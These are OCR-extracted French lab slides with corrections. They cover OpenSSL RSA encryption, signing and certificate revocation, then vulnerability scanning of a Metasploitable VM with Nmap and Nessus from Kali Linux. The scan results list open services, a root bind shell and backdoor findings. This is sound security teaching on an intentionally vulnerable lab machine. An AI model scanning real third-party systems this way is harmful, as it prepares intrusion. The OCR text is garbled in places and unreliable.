Not Before: Mar 19 20:41:51 2022 GMT 
Not After : Mar 19 20:41:51 2023 GMT 
Subject: C=MA, ST=MAROC, 0=0FPPT, OU=SECURITY, CN=ClientB/emailAddress=c 
lientB@gmail.com 
Subject Public Key Info: 
Public Key Algorithm: 
RSA Public-Key: 
Modulus: 
00: 


ClientB 
Identity: ClientB 
Verified by 
Expires: 03/19/2023 


Subject Name 
C (Country): 
ST (State): 
O (Organization): 


(0x2) 
sha256WithRSAEncryption 
L=NEW_CITY, 0=0FPPT, OU=SECURITY 


ST=MAROC, 


rsaEncryption 
(1024 


OU (Organizational Unit): 
CN (Common Name): 
EMAIL (Email Address): 


:al:5d:a6:4d: 
:6a: 
:e4: 
"TD: 
:e9: 
:fe: 
En: 
:Od: 


Issuer Name 
C (Country): 
ST (State): 
L (Locality): 
O (Organization): 
OU (Organizational Unit): 
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Le résultat de l’affichage du certificat du Client B en mode graphique 


ClientBcertificate.pem 


MA 

MAROC 

OFPPT 

SECURITY 

ClientB 
clientB@gmail.com 


MA 
MAROC 
NEW_CITY 
OFPPT 
SECURITY 


KO © : 
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CHIFFREMENT/DÉCHIFFREMENT 
ASYMÉTRIQUE DES FICHIERS 


Compétences visées : 


e  Chiffrer des fichiers en utilisant l’algorithme de chiffrement 
asymétrique RSA grâce à OpenSSL 


e Déchiffrer des fichiers en utilisant l'algorithme de 
chiffrement asymétrique RSA grâce a OpenSSL 


Recommandations clés : 


e Maitriser le principe d’un schéma de chiffrement 
asymétrique 


G) 1 heure 


| CONSIGNES 
oO WEBFORCE s 
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La Voie de l'Avenir 


1. Pour le formateur 


° Vapprenant doit être capable de chiffrer/déchiffrer des fichiers avec l'algorithme de 
chiffrement asymétrique RSA en utilisant OpenSSL 


2. Pour l’apprenant 


° Il est recommandée de maitriser les notions de base d’une PKI 
e Il faut utiliser les commandes fournies au début de l’activité 
° Il est également recommandé de suivre les étapes décrites dans l'énoncé 


3. Conditions de réalisation : 


° VirtualBox installé 
° Une machine Virtuelle Ubuntu qui a été utilisée dans l’activité 2. 


° Réalisation des activités précédentes (2, 3, et 4) avec succès. 


4. Critères de réussite : 


° Générer un fichier chiffré à partir d’un fichier en claire 


° Générer un fichier claire à partir d’un fichier chiffré 


Activité 5 \\ KO 
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La Fame are 


Chiffrement/déchiffrement asymétrique des fichiers 


e l'objectif principal de cette activité est de chiffrer et déchiffrer un fichier à l’aide d’un certificat numérique et une clé privée, respectivement. 


e Le tableau ci-dessous fournit les commandes nécessaires pour la réalisation de cette activité. 


Chiffre un fichier texte fichier.txt avec la clé publique du certificat 


- -in <fichier.txt > -i <certifi >-certin -out <fichier.enc> ae Pe Rare A 
openssl rsautl -encrypt -in <fichier.txt > -inkey <certificate> -certin -out <fichier.enc TE E TE ce Fiche pene 


Déchiffre un fichier fichier.enc avec la clé privée associée au certificat 


openssl rsautl -decrypt -in <fichier.enc > -inkey <keypriv> -out <fichier.dec> uale gour le chiffrement le fichier dechifre est ichiendec 


e Acet effet, il vous est demandé de réaliser les tâches suivantes : 


1. Créez un fichier, nommé fichier.txt, qui inclut le texte suivant : 


Bonjour tout le monde ! 
Ce deuxième document est utilisé pour tester le chiffrement/déchiffrement asymétrique avec 


l'algorithme RSA sous OpenSSL. 


2. Chiffrez le fichier fichier.txt en utilisant la clé publique du client A. Le fichier chiffré est nommé fichier.enc. Utilisez le certificat du client A généré dans l’activité 
précédente ; 


3. Déchiffrez le fichier fichier.enc. Le fichier chiffré est nommé fichier.dec ; 


m 
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4. Vérifiez que les deux fichiers fichier.txt et fichier.dec contiennent le même contenu. 
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Correction 
1. Pour créer le fichier fichier.txt, il suffit d'exécuter la commande sudo nano fichier.txt et de taper le texte. La figure ci-dessous illustre la création du fichier.txt. 


GNU nano 5.6.1 fichier.txt 
sonjour tout le monde ! 


Ce deuxieme document est utilisé pour tester le chiffrement/déchiffrement asymétrique 
avec l'algorithme RSA sous OpenSSL. 


2. Pour chiffrer le fichier fichier.txt avec la clé publique du client A, il suffit d'exécuter la commande suivante : 
sudo openssl rsautl -encrypt -inkey certs/ClientAcertificate.pem -certin -in /home/osboxes/fichier.txt -out /home/osboxes/fichier.enc 
3. Pour déchiffrer le fichier fichier.enc avec la clé privée du client A, il suffit d’exécuter la commande suivante : 
sudo openssl rsautl -decrypt -inkey private/ClientAkey.pem -in /home/osboxes/fichier.enc -out /home/osboxes/fichier.dec 
4. Pour vérifier que les deux fichiers fichier.txt et fichier.dec contiennent le méme contenu, il suffit d’exécuter la commande : 
diff /home/osboxes/fichier.txt /home/osboxes/fichier.dec 


La figure ci-dessous illustre l'exécution des commandes précédentes 


$ sudo openssl rsautl -encrypt -inkey certs/ClientAcertificate.pem -certin -in 
ee nee -out /home/osboxes/fichier.enc 
$ sudo openssl rsautl -decrypt -inkey private/ClientAkey.pem -in /home/osboxes/ 


fichier.enc -out /home/osboxes/fichier.dec 
Enter pass p for private/ClientAkey.pem: 
: $ diff /home/osboxes/fichier.txt /home/osboxes/fichier.dec 


aa WEBFORCE » 


ACTIVITE 6 
SIGNATURE DES FICHIERS 


BE THE 


Compétences visées : 


e Réaliser la signature numérique d’un fichier 


Recommandations clés : 


e  Maitriser le principe du signature numérique 


CONSIGNES 


WO  WEBFORCE» 
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La Voie de l'Avenir 


1. Pour le formateur 


° Vapprenant doit être capable de générer les empreintes des fichiers et les signer en 
utilisant OpenSSL 


° Il doit être également capable de vérifier la signature d’un fichier 


2. Pour l’apprenant 


° Il est recommandée de maitriser les notions de base d’une PKI 
° Il faut utiliser les commandes fournies au début de l’activité 
° Il est également recommandé de suivre les étapes décrites dans l'énoncé 


3. Conditions de réalisation : 
° VirtualBox installé 
° Une machine Virtuelle Ubuntu qui a été utilisée dans l’activité 2. 


° Réalisation des activités précédentes (2, 3, 4, et 5) avec succès. 


4. Critères de réussite : 
° Générer avec succès une empreinte d’un fichier 
° Signer un fichier avec succès 


° Vérifier la signature d’un fichier avec succès 


ait 
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Signature des fichiers D 
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e l'objectif principal de cette activité est de signer un fichier et vérifier un fichier signé à l’aide d’ une clé privée et un certificat numérique, respectivement. 


e Le tableau ci-dessous fournit les commandes nécessaires pour la réalisation de cette activité. 


Calcule l'empreinte numérique d’un fichier fichier.txt a l’aide d’une 
openssl dgst <-hachfunction > -out <fingerprint > <fichier.txt> fonction de hachage hachfunction. l'empreinte est enregistrée dans 
un fichier fingerprint. 


Signe un fichier à partir de son empreinte fingerprint et en utilisant la 


openssl rsautl -sign -in <fingerprint > -inkey <key > -out <signature> FRE Ne sa ae 
p 8 ES Le 8 clé privée key. Le fichier signé est nommé signature. 


openssl rsautl -verify -in <signature> -inkey <certificate> -certin -out Vérifie la signature en calculant l'empreinte fingerprint à partir d’un 
<fingerprint > fichier signé signature en utilisant une certificat numérique certificate. 


e A cet effet, il vous est demandé de réaliser les tâches suivantes : 
1. Calculez l'empreinte du fichier fichier.txt en utilisant comme fonction de hachage MD5. l'empreinte est enregistré dans un fichier nommé empreinte ; 


2. Signez le fichier fichier.txt en utilisant son empreinte numérique empreinte et la clé privé du client A généré dans l’activité 4. Le fichier signé est nommé 
signature ; 


3. Vérifiez le fichier signé signature en calculant son empreinte nommé empreinte 2 et en utilisant le certificat numérique du client A généré dans l'activité 4 ; 
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4. Vérifiez que les deux empreintes empreinte et empreinte2 contiennent le même contenu. 
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Correction 
1. Pour calculer l'empreinte du fichier fichier.txt en utilisant comme fonction de hachage MDS, il suffit d'exécuter la commande suivante : 
sudo openssl dgst -MD5 -out empreinte fichier.txt 
2. Pour signer le fichier fichier.txt en utilisant son empreinte numérique empreinte et la clé privé du client A, , il suffit d'exécuter la commande suivante : 
sudo openssl rsautl -sign -in empreinte -inkey /etc/activite/private/ClientAkey.pem -out signature 
3. Pour vérifier le fichier signé en calculant son empreinte nommé empreinte 2 et en utilisant le certificat numérique du client, il suffit d'exécuter la commande suivante : 
sudo openssl rsautl -verify -in signature -inkey /etc/activite/certs/ClientAcertificate.pem -certin -out empreinte2 
4. Pour vérifier que les deux empreintes empreinte et empreinte2 contiennent le même contenu, , il suffit d'exécuter la commande : sudo diff empreinte empreinte2 


(ag) 
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Les résultats de l’exécution des commandes précédentes sont illustrés dans la figure ci-dessous 


$ sudo openssl dgst -MD5 -out empreinte fichier.txt 
: $ sudo tail empreinte 
MD5(fichier.txt)= e670a0148347440f55c6f5bf02c75a7c 
$ sudo openssl rsautl -sign -in empreinte -inkey /etc/activite/private/ClientAkey.pem -o 


ut signature 
Enter pass phrase for /etc/activite/private/ClientAkey.pem: 
$ sudo tail signature 
OGtOV ; BOGEGSoEGonOTEiEOmO] cOGn@OV+EO:OnK 6O2<GOIP  GOGOOBHi”" ~Ge08we 


GOp{ReiGee' O0 
A# :~$ 
$ sudo openssl rsautl -verify -in signature -inkey /etc/activite/certs/ClientAcertificat 
e.pem -certin -out empreinte2 
: $ sudo tail empreinte2 
MD5(fichier.txt)= e670a0148347440f55c6f5bf02c75a7c 
$ diff empreinte empreinte2 


$ 
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GESTION DU CRL (CERTIFICATE LISTE 
REVOCATION) 


Compétences visées : 


Révoquer un certificat numérique 


Recommandations clés : 


Maitriser le principe des certificats numériques 


Maitriser les notions de base d’une PKI 


l CONSIGNES 
LO WEBFORCE + 


DEFFT BE THE CHANGE | 
1. Pourle formateur 
° Vapprenant doit être capable de révoquer un certificat numérique 
2. Pour l’apprenant 
° Il est recommandée de maitriser les notions de base d’une PKI 
e Il faut utiliser les commandes fournies au début de l’activité 
‘ ` : Il est également recommandé de suivre les étapes décrites dans l'énoncé 


. 3. Conditions de réalisation : 


. p ° VirtualBox installé 
° Une machine Virtuelle Ubuntu qui a été utilisée dans l’activité 2. 


° Réalisation des activités précédentes (2, 3, 4, 5, et 6) avec succès. 


Critères de réussite : 


= 


° Révoquer un certificat numérique avec succes 


Activité 7 \ O WwEBFORCEs 
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Gestion du CRL (Certificate Liste Revocation) J 
Gestion du CRL (Certificate Liste Revocation) 
e Cette activité vise a générer une liste de révocation de certificat (CRL) et révoquer un certificat. 
e Le tableau ci-dessous fournit les commandes nécessaires pour la réalisation de cette activité. 
openssl ca -gencrl -keyfile <CApriv.pem> -cert <CA_certificate.pem> -out ae ‘ 7 5 A A A. 
p oe rf y POSE z P Génère une première CRL vide, nommée crl_file, grace à l'option -gencrl 
openssl ca -revoke <certificate> -keyfile <CApriv.pem> -cert A ee p T 
p re y aiki Révoque un certificat client certificate. 
<CA_certificate.pem> 
e Acet effet, il vous est demandé de réaliser les tâches suivantes : 
1. Préparez l’environnement de travail en : 
e Créant un répertoire crl sous le chemin /etc/activite 
M e Créant un fichier crlnumber sous le chemin /etc/activite et l’initialisant à 01. 
Lu 2. Générez une une première CRL vide, nommée CRL. Utilisez la clé privée et le certificat du CA qui ont été généré dans l’activité 4 ; 
-_ 
= 3. Révoquez le certificat du client B qui a été créé dans l’activité 4 ; 
[a 4. Afficher le contenu du fichier crlnumber. 
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Correction 


1. Pour préparer l'environnement de travail, il suffit d'exécuter les commandes suivantes : 


e cd /etc/activite : $ cd /etc/activite/ 
: $ sudo mkdir crl 


e sudo mkdir crl 


e sudo touch crinumber : $ sudo touch crlnumber 
= $ sudo su 
* sudo su root@osboxes:/etc/activite# echo 01 > crlnumber 
e echo 01 > crinumber root@osboxes:/etc/activite# exit 
| exit 
° exit 


2. Pour générer une une première CRL vide, nommée CRL, exécutez la commande suivante : 


sudo openssl ca -gencrl -keyfile private/ofpptcakey.pem -cert cacerts/ofpptcacert.pem -out CRL 


$ sudo openssl ca -gencrl -keyfile private/ofpptcakey.pem -cert cacerts/ofpp 
tcacert.pem -out crl/CRL 


Using configuration from /usr/lib/ssl/openssl.cnf 


(ag) 
= 
| 
< 
a. 
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3. Pour révoquer le certificat du client B, exécutez la commande suivante: 


sudo openssl ca -revoke certs/ClientBcertificate.pem -keyfile private/ofpptcakey.pem -cert cacerts/ofpptcacert.pem 


$ sudo openssl ca -revoke certs/ClientBcertificate.pem -keyfile private/ofpp 
tcakey.pem -cert cacerts/ofpptcacert.pem 
Using configuration from /usr/lib/ssl/openssl.cnf 


Enter pass phrase for private/ofpptcakey.pem: 
Revoking Certificate 02. 
Data Base Updated 


4. Pour Afficher le contenu du fichier crinumber, exécutez la commande : sudo tail crlnumber 


$ tail crlnumber 


(ag) 
= 
| 
< 
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S’INITIER À L'AUDIT DE SÉCURITÉ DES SI 


Dans ce module, vous allez : 


e Apprendre à utiliser certains outils de test d’intrusion 
e Identifier les failles de sécurité d’un système cible 


e Exploiter certaines failles identifiées pour mener des 
scénarios d'attaques. 


aa WEBFORCE » 
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IDENTIFICATION DES VULNERABILITES 
D’UN SYSTEME 


Compétences visées : 


e Utiliser des outils de test d’intrusion pour identifier les failles 
de sécurité d’un système cible 


Recommandations clés : 


e  Maitriser le principe du test d’intrusion 
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CONSIGNES 


Pour le formateur 


Vapprenant doit être capable d'utiliser Kali Linux ainsi que des outils de test 
d’intrusion afin d’identifier les failles de sécurité du système Metasploitable (le 
systeme cible dans cette activité) 


Pour l’apprenant 


Il est recommandé de maitriser les notions de base de test d’intrusion et connaitre 
les attaques de sécurités ainsi que les failles de sécurité les plus courantes 


Il est également recommandé de suivre les étapes décrites dans l'énoncé 


Il faut utiliser les commandes fournies dans l’activité 


Conditions de réalisation : 


VirtualBox installé 


Une machine Virtuelle Kali Linux 2022.1. Lien de téléchargement : 
https://kali.download/virtual-images/kali-2022.1/kali-linux-2022.1-virtualbox- 


amd64.ova 


Une machine virtuelle Metasploitable. Lien de téléchargement : 
https://sourceforge.net/projects/metasploitable/files/latest/download 


Nessus on Kali Linux. Lien de téléchargement : Download Nessus | Tenable® 


Critères de réussite : 


Identifier les failles de sécurité du système cible 


Avoir un rapport de vulnérabilité du système cible généré par Nessus 


Activité 1 


Identification des vulnérabilités d’un système 
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Étape 1 : Préparation de l’environnement 


e L'objectif principal de cette activité est d'identifier les failles de sécurité et les risques associés à un système. Pour atteindre un tel objectif, nous avons besoin de 


préparer un environnement de test, qui est composé de : 


Une machine virtuelle Kali Linux : Comme présenté précédemment dans la partie 1, Kali est une distribution Linux qui implémente un ensemble d'outils 
permettant de tester le niveau de sécurité d'un système d'information via l'identification des failles et des risques de sécurité et également l'exploitation des 
failles identifiés . 


Metasploit : programme open source qui est implémenté dans Kali et permettant l'exploitation des vulnérabilités. En effet, il fournit des informations sur les 
vulnérabilités de systèmes informatiques et les exploite. Il est équipé d’une base de données intégrant les vulnérabilités existantes à ce jour. 


Nmap : c'est parmi les outils qui sont installés par défaut on Kali. Il permet de réaliser le scan des ports à des systèmes pour détecter les ports ouverts, identifier 
les services hébergés et obtenir des informations sur les systèmes d'exploitation. 


Nessus : c'est un outil de scan de vulnérabilité très performant et très puissant. Il fournit des informations avancées en le comparant a Nmap. C'est un logiciel 
payant pour les professionnels. Une version de test pourra être utilisée. 


Une machine virtuelle Metasploitable : une machine virtuelle Linux intentionnellement vulnérable et qui peut être utilisée pour effectuer une formation à la 
sécurité, tester des outils de sécurité et pratiquer des techniques de test d’intrusion courantes. 


e Le travail demandé dans cette étape est : 


1. 


2 
3. 
4 


Lancez les deux machines virtuelles Kali et Métasploitable ; 
Identifiez les adresses IP des deux machines virtuelles ; 
Vérifiez que la machine Kali est à jour et qu’elle implémente les deux outils Nmap et Metasploit ; 


Téléchargez et Installez Nessus dans la machine Kali. 


N 
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Étape 2 : Identification des vulnérabilités 


e Après avoir préparé l’environnement de travail, il est maintenant possible d'identifier les vulnérabilités et les risques associés à un système cible. 
e Dans cette activité : 

e Le système cible est Métasploitable. 

e Les outils de scan sont : Nmap est Nessus installés on Kali Linux. 
e Travail demandez : 


1. Utilisez Nmap pour identifier les ports ouverts ainsi que le système d’exploitation du système cible 


E Remarques 


Nmap peut être lancé via le terminal de la machine Kali. Les options suivantes pourront être utilisées : 


e -sV : sondez les ports ouverts pour déterminer les informations de service/version 


e -O : Activer la détection du système d'exploitation 


e Syntaxe de la commande est : sudo nmap [options] @IP 


2. Utilisez Nessus pour identifier les failles de sécurité et les vulnérabilités de la machine Metasploitable. 


+ 
= 
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Étape 1 : Préparation de l’environnement 


L'adresse IP de la machine virtuelle Metasploitable est : 192.168.1.8 


msfadmin@metasploitable:"$ ifconfig 


etho Link encap:Ethernet HWaddr 08:00:27:22:b9:44 
inet addr:192.168.1.8 Bcast:192.168.1.255 Mask:255.255.255.0 
inet6 addr: fdaB:c83a:5aic:2f00:a00:27ff :fe22:b944/64 Scope:Global 
inet6 addr: fe80::a00:27ff :fe22:b944/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:154 errors:0 dropped:0 overruns:0 frame:0 
TX packets:61 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:1000 
RX bytes:22101 (21.5 KB) TX bytes:6482 (6.3 KB) 
Base address:0xd020 Memory :f0200000-f 0220000 


Link encap:Local Loopback 

inet addr:127.0.0.1 Mask:255.0.0.0 

inet6 addr: ::1/128 Scope ‘Host 

UP LOOPBACK RUNNING MTU:16436 Metric:1 

RX packets:97 errors:0 dropped:0 overruns:0 frame:0 
TX packets:9? errors:0 dropped:0 overruns:0 carrier:0 
collisions :0 txqueuelen:0 

RX bytes:21529 (21.0 KB) TX bytes:21529 (21.0 KB) 
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L'adresse IP de la machine virtuelle Kali est : 192.168.1.7 


TA aliG kali)-[~] 


Le j ig 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 

inet 192.168.1.7 netmask 255.255.255.0 broadcast 192.168.1.255 

inet6 fda8:c83a:5a1c:2f00:a9fe:8820:efe3:c118 prefixlen 64 scopeid 
@x@<global> 

inet6 fe80::a00:27ff:fe95:bd54 prefixlen 64 scopeid 0x20<Link> 

inet6 fda8:c83a:5a1c:2f00:a00:27ff:fe95:bd54 prefixlen 64 scopeid 
@x@<global> 

ether 08:00:27:95:bd:54 txqueuelen 1000 (Ethernet) 

RX packets 288 bytes 45725 (44.6 KiB) 

RX errors © dropped @ overruns @ frame 0 

TX packets 34 bytes 4794 (4.6 KiB) 

TX errors @ dropped @ overruns @ carrier @ collisions @ 


lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 
inet 127.0.0.1 netmask 255.0.0.0 
inet6 ::1 prefixlen 128 scopeid 0x10<host> 
loop txqueuelen 1000 (Local Loopback) 
RX packets @ bytes @ (0.0 B) 
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Étape 1 : Préparation de l’environnement 


Pour vérifier que Nmap est installé dans Kali, il suffit de taper la commande 


Pour vérifier que Metasploit est installé dans Kali, il suffit de taper la commande f , 2 f ; 
sudo nmap et avoir comme résultat celui affiché dans la figure ci-dessous 


sudo msfconsole et avoir comme résultat celui affiché dans la figure ci-dessous 


-$ sudo 


[sudo] password for kali: 


—-(kali®& kali)- 
-$ nmaj 
Nmap 7.92 ( https://nmap.org ) 
Usage: nmap [Scan Type(s)] [Options] {target specification} 
TARGET SPECIFICATION: 


Can pass hostnames, IP addresses, networks, etc. 

Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 
-iL <inputfilename>: Input from list of hosts/networks 

-iR <num hosts>: Choose random targets 

—exclude <hosti[,host2][,host3], ...>: Exclude hosts/networks 
—excludefile <exclude_file>: Exclude List from file 


/ Metasploit! \ 


/ 


—=[ 2196 exploits - 1162 auxiliary - 400 post 
— =[ 596 payloads - 45 encoders - 10 nops 
—=[ 9 evasion 


+ 
= 
= 
< 
a 


Metasploit tip: View a module's description using 
o, or the enhanced version in your browser with 
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Étape 1 : Préparation de l’environnement 


e Pour installer Nessus dans la machine Kali, il suffit de suivre les étapes suivantes : 
1. Accédez à la page de téléchargement via le lien suivant : Download Nessus | Tenable® 


2. Téléchargez la version Nessus-10.1.1-debian6_amd64.deb comme illustré dans la figure ci-dessous. En fait c'est la version adéquate pour une machine Kali. 


Opening Nessus-10.1.1-debian6_amd64.deb 


i hacen tA ¢ 
ve chosen to OPA 


D Nessus-10.1.1-debian6_amd64.deb 


Téléchargement de Nessus What should Firefox do with this file? 


Engrampa Archive Manager (default) 


+ 
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Étape 1 : Préparation de l’environnement 


3. Installez le package la version Nessus-10.1.1-debian6_amd64.deb téléchargé en exécutant la commande sudo apt install ./Nessus-10.1.1-debian6_amd64.deb 
comme illustré dans la figure ci-dessous. 


~ 


1Li/Downlo 


~/DownlLoads 


+ 
= 
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4. Apres installation, il suffit d'exécuter les commandes suivantes : 5. Lancez ensuite un navigateur et tapez dans la barre de navigation : 
e sudo systemctl enable nessusd e  https://kali:8834 ou 
e sudo systemctl nessusd start e https: IPKali:8834 


e sudo systemctl nessusd status 


)-[=/Downloads | 
sudo systemctl enable nessusd 
Ë Created symlink /etc/systemd/system/nessusd.service > /Lib/systemd/system/nes 
susd.service. 
Created symlink /etc/systemd/system/multi-user.target.wants/nessusd.service > 
/lib/systemd/system/nessusd.service. 


mN kali 


Docs X Kali Forums €& Kali NetHunter Exploit-DB Google Hacking DB 


)-[~/Downloads | 
stemctl start nessusd 


-[-/Downloads | 
stemctl status nessusd.service 
e nessusd.service - The Nessus Vulnerability Scanner 


2. 


Loaded: loaded (/lib/systemd/system/nessusd.service; enabled; vendor pr 
Active: active (running) since Mon 2022-03-21 13:12:30 EDT; 34s ago 
Main PID: 9623 (nessus-service) 
Tasks: 13 (limit: 2275) 
Memory: 143.4M 


What can you de about it? 
CPU: 31.748s 
CGroup: /system.slice/nessusd.service 


+ 
= 
= 
< 
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Mar 21 13:12:30 kali systemd[1]: Started The Nessus Vulnerability Scanner. 
Mar 21 13:12:32 kali nessus-service[9625]: Cached @ plugin libs in @msec 
Mar 21 13:12:32 kali nessus-service[9625]: Cached © plugin libs in Omsec 


Ge Sack Mocommndud) Advanced... 
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Étape 1 : Préparation de l’environnement 


Les interfaces suivantes représentent les interfaces nécessaires pour le lancement et l'activation de Nessus. 


nessus 


Essentials 


+ 
= 
= 
< 
a 


Activité 1 \ KO 


; OFPPT 
Correction SR 


Étape 1 : Préparation de l’environnement 


Les interfaces suivantes représentent les interfaces nécessaires pour le lancement et l'activation de Nessus. 


nessus 
Essentials i 
( )nessus 


Create a user account 


Create a Nessus administrator user account Use 


this username and password to log in to Nessus. Initializing 


Jsername * Please wait while Nessus prepares the files 
Woe lth 
needed to scan your assets 
nour 
Downloading plugins. 
Password * 


cecel 


+ 
-= 
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Étape 1 : Préparation de l’environnement 


La page d’accueil de Nessus est la suivante 


© Ge impa 9216817853 


= 7 Remarques 


Il est probable que l'initialisation de Nessus (étape illustrée dans 
la dernière interface illustré dans le slide précédent) dure 
longtemps, il faut l’attendre. 


Welcome to Nessus Essentials 


Si vous rencontrez des problèmes, il est possible de consulter le 


(OR, 122 108.204 à ANKE RA, 
MOIST | or À rommavapa ahed Bet jag, 190.7 MEIN 


site accessible via le lien suivant 

https://community.tenable.com/s/article/Nessus-scanner-is- 

stuck-in-the-Initializing-process 

Ce site vous fournit les commandes nécessaires pour régler les 
problemes rencontrés. 


+ 
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Étape 2 : Identification des vulnérabilités 
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Pour identifier les ports ouverts ainsi que le système d’exploitation du système cible en utilisant nmap, il suffit d'exécuter la commande suivante 
sudo nmap -sV -o 192.168.1.8. 


Les figures ci-dessous illustrent le résultat de la commande exécutée qui consiste à l’ensemble des ports ouverts et le système d’exploitation. 


-$ 


-0 192.168.1.8 


[sudo] password for kali: 


Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-24 08:00 EDT 
Nmap scan report for 192.168.1.8 

Host is up (0.00046s latency). 

Not shown: 977 closed tcp ports (reset) 

STATE SERVICE 


PORT 
21/tcp 
22/tcp 
23/tcp 
25/tcp 
53/tcp 
80/tcp 
111/tcp 
139/tcp 
445/tcp 
512/tcp 
513/tcp 
514/tcp 
1099/tcp 
1524/tcp 
2049/tcp 
2121/tcp 
3306/tcp 
5432/tcp 
5900/tcp 
6000/tcp 
6667/tcp 
8009/tcp 
8180/tcp 


open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 
open 


ftp 

ssh 

telnet 
smtp 
domain 
http 
rpcbind 
netbios-ssn 
netbios-ssn 
exec 

login 
tcpwrapped 
java-rmi 
bindshell 
nfs 

ftp 

mysql 
postgresql 
vnc 

X11 

irc 

ajp13 

http 


VERSION 

vsftpd 2.3.4 

OpenSSH 4.7p1 Debian 8ubuntul (protocol 2. 
Linux telnetd 

Postfix smtpd 

ISC BIND 9.4.2 

Apache httpd 2.2.8 ((Ubuntu) DAV/2) 

2 (RPC #100000) 

Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 
Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 
netkit-rsh rexecd 

OpenBSD or Solaris rlogind 


GNU Classpath grmiregistry 
Metasploitable root shell 
2-4 (RPC #100003) 

ProFTPD 1.3.1 


MySQL 5.0.51a-3ubuntu5 

PostgreSQL DB 8.3.0 - 8.3.7 

VNC (protocol 3.3) 

(access denied) 

UnrealIRCd 

Apache Jserv (Protocol v1.3) 

Apache Tomcat/Coyote JSP engine 1.1 


Unix, Linux 


t https:/ 


nmap. org/subnit 
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Étape 2 : Identification des vulnérabilités 


Pour lancer le scan de vulnérabilités en utilisant Nessus, choisissez l'option Advanced Scan 


( \nessus 
i i tal 


Scan Templates 
< Back to Scans 


My Scans 


All Scans 
Scanner 


Trash 


Policies & 
@ 


Plugin Rules 
Host Discovery 


M F: © 9 D 


Basic Network Scan Advanced Scan Advanced Dynamic Scan Malware Scan Mobile Devic 


CNAPP: What Is It and 
Why Is It Important 


= © À RA 


Web Application Tests Credentialed Patch Audit Intel AMT Security Bypass Spectre and Meltdown WannaCry Ransomware 


q 
= 
= 
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Etape 2 : Identification des vulnérabilités 


La fenêtre ci-dessous s’affiche. Donnez un nom au scan a effectuer, Metasploitable Scan par exemple, et comme cible (Targets) saisissez l’adresse IP de la machine cible 
(192.168.1.8, dans notre exemple) ou aussi la plage d’adresse du réseau. Cliquez ensuite sur Save. 


/ \nessus 


Settings Credentials Plugins 
My Scans 


All Scans BASIC 
Metasploitable Scan 
Trash General P 
Schedule 
Description 


Notifications 
Policies 


ISCOVERY 
Plugin Rules DISCOVE 


ASSESSMENT Folder 


REPORT 


Targets 
ADVANCED 


Tenable News Upload Targets Add File 


Multiple 
Vulnerabilities in 
Trend Micro 
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Étape 2 : Identification des vulnérabilités 


La figure ci-dessous illustre l'enregistrement de la configuration du scan effectué précédemment. Pour lancer le scan, il suffit de cliquer sur le bouton démarrer. 


New Folder © New Scar 


Name Schedule Last Modified + 


Metasploitable Scan On Demand CĈ) Today at 12:08 PM 


+ 
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Après avoir effectué le scan, un résumé de vulnérabilité sera fourni par Nessus comme illustré dans la figure ci-dessous. 


O 4 wr & 


Metasploitable Scan 


< Back 10 My Scans 


Configure Audit Trai Launch + 


Hosts 1 Vulnerabilities 72 Remediations 4 VPR Top Threats Q History 1 
Filter + 


Host Vulnerabilities + Scan Details 


Status: Completed 
Severity CVSS v2.0 
Scanner: Local Scanner 
Start: Today at 12:08 PM 
End: Today at 12:27 PM 


Elapsed: 19 minutes 


Vulnerabilities 


Critica 


L Æ H gt 
Medium 
Low 


DE info 


W 


EBFORCE » 


BE THE CHANGE 
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Correction 


Étape 2 : Identification des vulnérabilités 


Pour visualiser les vulnérabilités identifiés, il suffit de sélectionner Vulnérabilités. Selon le résultat illustré dans la figure ci-dessous, 72 vulnérabilités ont été identifiées 
dans la machine Metasploitable. Il est possible de sélectionner les vulnérabilités une par une pour avoir plus de détails sur chaque vulnérabilités. 


$ 


Name . Family . Count + Scan Details 


Bind Shell Backdoor Detextion Backdoors 1 Policy: Advanced Scan 
Status Completed 


NFS Exported Share information Disclosure RPC 1 Severity Base: CVSS v2.0 
Scanner: Local Scanner 


rexecd Service Detection Service detection 1 Start: Today at 12:08 PM 
End: Today at 12:27 PM 


Unix Operating System Unsupported Version Dete. General 1 Elapsed: 19 minutes 


UnrealiRCd Backdoor Detection Backdoors 1 Vulnerabilities 


VNC Server ‘password’ Password Gain a shell remotely Critical 


M, :: 
> SSL (Multiple Issues) Gain a shell remotely Medium 
Low 

Y Info 


rlogin Service Detection Service detection 


+ 
= 
[= 
< 
a. 


HIGH 


ED 


in 
5 


rsh Service Detection 


ISC Bind (Multiple Issues) 


2 SSL (Multiple Issues) 


Apache Tomcat (Multiple Issues) 


Service detection 


DNS 


Service detextion 


Web Servers 
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Etape 2 : Identification des vulnérabilités 


Pour visualiser les risques identifiés, il suffit de sélectionner VPR TOP THREATS. Selon le résultat illustré dans la figure ci-dessous, 10 risques ont été identifiés pour la 
machine Metasploitable 


Assessed Threat Level: Critical 


The following vulnerabilities are ranked by Tenadle’s patented Vulnerability Priority Rating Scan Details 

(VPR) system, The findings listed below detail the top ten vulnerabilities, providing a 

oriontzed wiew to help guide remediation to effectively reduce risk. Policy. Advanced Scan 
Chick on each finding to show further details along with the impacted hosts. Status: Completed 


To learn more about Tenable’s VPR scoring system, see Predictive Prioritization, Severity Base: CVSS v2.0 


Scanner: Local Scanner 
Name Reasons Start Today at 12:08 PM 
End: Today at 12:27 PM 


Apache Tomcat AJP Connector Request injection (Ghostcat] Social Media; Mainstream Medii...9. 
J aw à i ar Elapsed: 19 minutes 


Debian OpenSSH/OpenSSL Package Random Number Generator Weakness No recorded events 


Debian OpenSSH/OpenSSL Package Random Number Generator Weaknes...No recorded events 


t 


UnrealiRCd Backdoor Detection No recorded events 


Samba Badlock Vulnerability No recorded events 


SMTP Service STARTTLS Plaintext Command injection No recorded events 


rexecd Service Detection No recorded events 


rlogan Service Detection No recorded events 


rsh Service Detection No recorded events 


+ 
= 
[= 
< 
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NFS Exported Share Information Disclosure No recorded events 
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Etape 2 : Identification des vulnérabilités 


